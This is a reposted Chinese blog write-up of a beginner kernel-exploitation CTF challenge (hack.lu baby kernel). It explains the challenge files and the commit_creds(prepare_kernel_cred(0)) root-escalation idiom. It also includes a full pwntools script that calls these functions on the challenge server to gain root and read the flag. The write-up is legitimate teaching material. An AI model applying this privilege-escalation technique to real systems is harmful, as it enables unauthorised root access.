First Kernel-pwn

最新推荐文章于 2022-12-20 11:21:10 发布
最新推荐文章于 2022-12-20 11:21:10 发布
阅读量220 收藏
点赞数
文章标签: python shell
原文链接:http://www.cnblogs.com/ZHijack/p/9835495.html
版权

Kernel pwn-极简题目的操作模式

完全参照M4x师傅的指导,用 hacklu的baby kernel迈了第一步

题目附带文件说明

一般题目会给出bzImage,.cpio, .sh文件

  • sh文件适用于启动kernel的shell脚本文件,参数决定了内核的保护情况。

  • .cpio文件为文件系统映像。将其解压可以获得服务器交互程序的客户端

  • bzImage为kernel binary,可视为压缩后的文件

  • vmlinux文件(if exists), 未经压缩的kernel文件,为ELF格式。

    • 如果没有vmlinux文件,可以通过extract-vmlinux提取

    • ./extract-vmlinux ./bzImage > vmlinux

基本操作

  1. 获得服务器文件系统环境

    解压cpio文件,能够获得服务器内部文件分布,包括创建环境的init脚本和交互程序。

    在inti文件中,通过insmod命令加载驱动模块 

    insmod /lib/modules/4.4.72/babydriver.ko

    一般情况下,被加载的LKM即为漏洞所在。

    .ko文件也是ELF文件格式,可以通过ida进行分析。

    可以通过分析交互elf文件,确定交互逻辑和调用内核模块的??

  2. 提权

    最常用的提权手段:

    commit_creds(prepare_kernel_cred(0))

    两个函数的地址可以在 /proc/kallsyms中查看。

    vmlinux是未压缩的kernel文件(ELF格式),可以通过vmlinux提取到gadget,当然也可以从vmlinux文件中获取上面两个函数的地址。

  3. loadling…

#!/usr/bin/env python
# -*- coding: utf-8 -*-
# 
from pwn import *
#context.log_level = 'debug'
context.terminal = ['deepin-terminal', '-x', 'sh', '-c']
# io = process('./client_kernel_baby')
io = remote('arcade.fluxfingers.net', 1817)
kernel = ELF('./vmlinux')

# get the address of 2 functions from vmlinux
cred = kernel.sym['prepare_kernel_cred']
commit = kernel.sym['commit_creds']

# run prepare kernel cred(0) and get the return value
io.recvuntil('----- Menu -----')
io.sendlineafter('> ', '1')
io.sendlineafter('>', str(cred))
io.sendlineafter('>', '0')
io.recvuntil('It is: ')
ret_val = int(io.recvuntil('\n', drop = True),16)

# run commit cred to get root private
io.sendlineafter('> ', '1')
io.sendlineafter('>', str(commit))
io.sendlineafter('>', str(ret_val))

# read flag as root
io.sendlineafter('> ', '3')
io.sendlineafter('>', 'flag')

io.interactive()

 

 

 

 


作者:辣鸡小谱尼
出处:http://www.cnblogs.com/ZHijack/
如有转载,荣幸之至!请随手标明出处;

转载于:https://www.cnblogs.com/ZHijack/p/9835495.html

aoque9909
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
kernel pwn ——(1)
qq_39869547的博客
03-17 358
文件 to_pwner.tar.xz 解压命令: xz -d to_pwner.tar.xz 再次解压:tar -xvf to_pwner.tar 之后获得 src文件夹 获得src文件夹 ,里面包含了启动脚本startvm.sh 和问题驱动mod.ko, bzImage 是经过压缩的原始内核文件。 运行脚本尝试获得一些信息: 加载进来,是在别的目录里,驱动程序应该是一开始就已经加载了的,...
2018 0CTF Finals Baby Kernel
weixin_46483787的博客
04-14 303
学kernel的第三天,仍然很不想学 拿到题目先看看启动项 #!/bin/sh mount -t proc none /proc mount -t sysfs none /sys mount -t devtmpfs devtmpfs /dev echo "flag{this_is_a_sample_flag}" > flag chown root:root flag chmod 400 flag exec 0</dev/console exec 1>/dev/console exec 2
openEuler x86_64 extract-vmlinux生成内核vmlinux 源码编译生成vmlinux 配置kdump crash分析内核崩溃kernel panic
hknaruto的专栏
12-20 868
采用VirtualBox虚拟机测试CPU信息操作系统及内核信息系统默认开启了kdump,查看服务状态查看内核命令行参数对应/boot/grub2/grub.cfgvmcore生成路径配置/etc/kdump.conf。
linux之vmlinux、vmlinuz、System.map和/proc/kallsyms简介
热门推荐
小立仔
05-31 1万+
vmlinux、vmlinuz、System.map和/proc/kallsyms简介
extract-vmlinux 脚本分析
qq_40227064的博客
04-10 682
extrect-vmlinux,解析vmlinuz脚本分析
CSAWCTF-2018-pwn-shellcode|CSAWCTF-2018-pwn-shellcode
12-10
CSAWCTF 2018年pwn题 shellcode 变形shellcode练手题目,该题目主要是利用三个节点来注入shellcode,考验解题人对shellcode的熟悉程度。题解:https://blog.csdn.net/A951860555/article/details/110350773
mqtt-pwn:MQTT-PWN打算成为IoT Broker渗透测试和安全评估操作的一站式服务
05-02
MQTT-PWN MQTT是一种机器对机器的连接协议,被设计为一种极其轻量级的发布/订阅消息传递,并已被全球数百万个IoT设备广泛使用。 MQTT-PWN打算成为IoT Broker渗透测试和安全评估操作的一站式商店,因为它结合了枚举...
Wi-PWN_8.0_ENGLISH.bin
08-25
ESP8266的WIFI杀手固件,这是不带显示的。 我后续更新带OLED显示的固件。教程后将更新。
Wi-PWN_8.0_ENGLISH_OLED.bin
08-25
这是ESP8266的带OLED显示的WIFI杀手固件。
ctf题库ctf-pwn赛题收集
03-31
ctf题库 CTF(夺旗赛)题库是一个由安全专家和爱好者们制作的一系列网络安全挑战。... ...每个类别都包含多个挑战,每个挑战都有一个或多个标志(flag)。参赛者必须通过解决每个挑战来获取相应的标志,然后提交标志以获得...
Linux 启动过程分析
程序员的那些事
03-18 394
(点击上方公众号,可快速关注)英文:Alison Chaiken,翻译:Linux中国/jessie-panglinux.cn/article-9437-1.html理解运转良好的系统对于处理不可避免的故障是最好的准备。关于开源软件最古老的笑话是:“代码是自具文档化的self-documenting”。经验表明,阅读源代码就像听天气预报一样:明智的人依然出门会看看室外的天气。本文讲述了如何运用调试
Linux内核之vmlinuz反汇编
weixin_30905133的博客
07-11 846
本文介绍在Fedora上对Linux内核的vmlinuz进行反汇编。如果内核是debug版本,可以用来查看某个函数的源代码。 1. 安装kernel-devel软件包 dnf -y install kernel-devel 2. 提取vmlinux vmlinux是一个包括Linux kernel的静态链接的可运行文件。 vmlinuz是vmlinux经过gzip和...
如何测试centos7.x crash 工具
palm_m的专栏
05-17 696
检测内核配置 挂载iso,配置本地yun源 安装kexec 安装kdump工具 通过vmlinuxz-* 压缩内核获得 vmlinux 非压缩内核 extract-vmlinux /boot/vmlinuxz-* > vmlinux 压缩内核的查看,解压压缩内核的查看 file /boot/vmlinuxz-* file /boot/vmlinux 运行crash工具...
二十分钟Linux ftrace原理抛砖引玉
Netfilter
11-30 6420
周末要去忙别的事情,所以没有时间总结些东西了,那就今晚写简单点吧。 我们可以通过objdump -D看到内核模块或者用户态程序里面的函数开头的指令,以便知道如果想hook它的话,要预先备份多少指令。 但是如何看到内核函数的开头几个指令呢? 我试图去objdump系统boot目录下的vmlinux,但是什么也看不到。这里说一句,如果你的/boot目录下只有vmlinuz,那么首先你必须将其解压成v...
linux内核pwn,Linux Kernel Pwn 0:1
weixin_36473811的博客
04-29 175
0x00 Setup#基础概念#vmlinux 是未压缩的可执行内核文件vmlinuz 是压缩后的可执行文件 包括bzimage\zimageinitrd (initial ramdisk)是用于启动时临时引导硬件到内核的临时文件系统内核向下控制管理硬件,向上提供应用运行环境运行环境#apt-get install qemu-system启动命令示例qemu-system-x86_64 -init...
linux内核态real cred,Linux内核源码分析 -- 更新当前进程的 cred -- commit_creds
weixin_28957683的博客
05-07 759
浅析一下用来修改当前进程 cred 的函数 commit_creds源码版本:Linux kernel 5.9.9首先来看 cred 结构/** The security context of a task** The parts of the context break down into two categories:** (1) The objective context of a tas...
pwn level1、level2
qq_43613772的博客
07-24 963
下载文件之后马上查一下保护,NX为打开状态,NX为文件保护的一种方式。 用IDA打开进行反汇编,找溢出点。 看到很显眼的system后,于是想着是否可以通过控制调用system(“/bin/sh”)得到shell,将返回地址用system的地址覆盖,将传入参数设置成”/bin/sh”,用ida查找了一下字符串,刚好发现了”/bin/sh”,记下地址。 逻辑示意图: 注意不能在vulnerabl...
NCSTISC Linux Kernel PWN450
Tesi1a的充电桩
11-25 296
0x00 参考: 通过真题理解通过UAF漏洞修改tty_strcut绕过semp并进行提权。 http://whereisk0shl.top/NCSTISC Linux Kernel pwn450 writeup.html https://www.anquanke.com/post/id/85281 https://www.anquanke.com/post/id/86490 0x01 UAF漏...
mqtt-pwn安装
最新发布
09-20
安装mqtt-pwn的步骤如下: 1. 克隆mqtt-pwn仓库:使用命令`git clone https://github.com/akamai-threat-research/mqtt-pwn.git`将mqtt-pwn仓库克隆到本地。 2. 进入mqtt-pwn目录:使用命令`cd mqtt-pwn`进入mqtt-...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值